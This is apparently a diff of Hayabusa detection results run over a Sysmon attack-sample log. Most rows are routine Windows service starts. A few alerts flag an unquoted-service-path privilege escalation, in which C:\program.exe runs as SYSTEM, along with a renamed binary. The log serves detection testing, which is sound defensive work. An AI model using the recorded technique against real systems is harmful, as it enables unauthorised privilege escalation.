+2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1624 | PGUID: 747F3D96-B765-5EA4-0000-00108B0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1640 | PGUID: 747F3D96-B765-5EA4-0000-0010EA0A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1676 | PGUID: 747F3D96-B765-5EA4-0000-00102B0F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1780 | PGUID: 747F3D96-B765-5EA4-0000-001028190100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dxgiadaptercache.exe | Process: C:\Windows\System32\dxgiadaptercache.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule | LID: 0x3e7 | PID: 1876 | PGUID: 747F3D96-B765-5EA4-0000-0010831F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1912 | PGUID: 747F3D96-B765-5EA4-0000-00109B240100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1920 | PGUID: 747F3D96-B765-5EA4-0000-001031250100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1936 | PGUID: 747F3D96-B765-5EA4-0000-0010BE260100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1996 | PGUID: 747F3D96-B765-5EA4-0000-0010572D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1440 | PGUID: 747F3D96-B765-5EA4-0000-00107A380100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1552 | PGUID: 747F3D96-B765-5EA4-0000-00100B390100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2076 | PGUID: 747F3D96-B765-5EA4-0000-0010AA430100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.481 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\DeliveryOptimization\Logs\dosvc.20200425_221917_750.etl | Process: C:\Windows\System32\svchost.exe | PID: 2056 | PGUID: 747F3D96-B765-5EA4-0000-00106B420100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2204 | PGUID: 747F3D96-B765-5EA4-0000-0010344D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2364 | PGUID: 747F3D96-B765-5EA4-0000-001016620100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2408 | PGUID: 747F3D96-B766-5EA4-0000-0010C4680100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2476 | PGUID: 747F3D96-B766-5EA4-0000-0010366F0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2488 | PGUID: 747F3D96-B766-5EA4-0000-001019700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2496 | PGUID: 747F3D96-B766-5EA4-0000-001046700100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\NETWORK SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e4 | PID: 2632 | PGUID: 747F3D96-B766-5EA4-0000-0010A4790100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k utcsvc -p | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2640 | PGUID: 747F3D96-B766-5EA4-0000-0010067A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2704 | PGUID: 747F3D96-B766-5EA4-0000-0010DE7E0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2736 | PGUID: 747F3D96-B766-5EA4-0000-0010A7800100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 2772 | PGUID: 747F3D96-B766-5EA4-0000-001074830100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\wlms\wlms.exe | Process: C:\Windows\System32\wlms\wlms.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2848 | PGUID: 747F3D96-B766-5EA4-0000-0010D4880100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"PrivEsc - Potential Unquoted Service Exploit | Cmd: c:\Program Files\vulnsvc\mmm.exe | Process: C:\program.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2856 | PGUID: 747F3D96-B766-5EA4-0000-0010E7880100 | Hash: SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,medium,Evas,Renamed Binary,,rules/sigma/process_creation/proc_creation_win_renamed_binary.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2876 | PGUID: 747F3D96-B766-5EA4-0000-0010038A0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 2900 | PGUID: 747F3D96-B766-5EA4-0000-00104A8D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 3044 | PGUID: 747F3D96-B766-5EA4-0000-0010BAA10100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.050 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: sihost.exe | Process: C:\Windows\System32\sihost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager | LID: 0x1d39b | PID: 3752 | PGUID: 747F3D96-B767-5EA4-0000-0010FE2E0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.058 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3760 | PGUID: 747F3D96-B767-5EA4-0000-0010D0310200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.097 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService | Process: C:\Windows\System32\svchost.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x1d39b | PID: 3820 | PGUID: 747F3D96-B767-5EA4-0000-001097430200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:32.358 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 4264 | PGUID: 747F3D96-B768-5EA4-0000-00106FAE0200,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:35.125 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\userinit.exe | Process: C:\Windows\System32\userinit.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: winlogon.exe | LID: 0x1d39b | PID: 4536 | PGUID: 747F3D96-B769-5EA4-0000-00101D9C0300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:35.236 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x1d39b | PID: 4600 | PGUID: 747F3D96-B76A-5EA4-0000-0010EEB50300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\Temp | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCache | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetHistory | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:36.984 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Packages\warp_jit_81c7ad1a-a25c-4a75-b512-788e5de33cfe\AC\INetCookies | Process: C:\Windows\System32\svchost.exe | PID: 5632 | PGUID: 747F3D96-B76E-5EA4-0000-001034090600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:37.209 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe AppXDeploymentExtensions.OneCore.dll,ShellRefresh | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc | LID: 0x1d39b | PID: 5840 | PGUID: 747F3D96-B76F-5EA4-0000-0010624D0600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:40.692 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 6964 | PGUID: 747F3D96-B776-5EA4-0000-0010A74D0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:40.712 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications | Process: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\RuntimeBroker.exe -Embedding | LID: 0x1d39b | PID: 7000 | PGUID: 747F3D96-B776-5EA4-0000-001006590B00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.341 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 6656 | PGUID: 747F3D96-B79B-5EA4-0000-00105BD50F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.402 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 6964 318 0000021FF2606500 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6648 | PGUID: 747F3D96-B79B-5EA4-0000-001075DA0F00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:11.516 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\eventvwr.exe"" | Process: C:\Windows\System32\eventvwr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d36c | PID: 748 | PGUID: 747F3D96-B79B-5EA4-0000-001001FC0F00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.073 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Discovery - domain time | Cmd: ""C:\BGinfo\BGINFO.EXE"" /accepteula /ic:\bginfo\bgconfig.bgi /timer:0 | Process: C:\BGinfo\BGINFO.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x1d39b | PID: 7056 | PGUID: 747F3D96-B7A0-5EA4-0000-001026D11000 | Hash: SHA1=1CEE3FA8419BDF4CBC266461277E3FDD9B93DE25,MD5=3652BA8B882BF6C69AF70CE73CF0D616,SHA256=0362CD6E7B318AB9A4C74DAF229F11BB795A2CE553EA024CB49143456C27C41D,IMPHASH=6EC19FF15BC88DDEDB96115003A96430",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.165 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\SecurityHealthService.exe | Process: C:\Windows\System32\SecurityHealthService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 7088 | PGUID: 747F3D96-B7A0-5EA4-0000-001027D81000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:20:16.965 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe -Embedding | Process: C:\Users\IEUser\AppData\Local\Microsoft\OneDrive\19.232.1124.0012\FileCoAuth.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0x1d39b | PID: 3376 | PGUID: 747F3D96-B7A0-5EA4-0000-00108D131100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
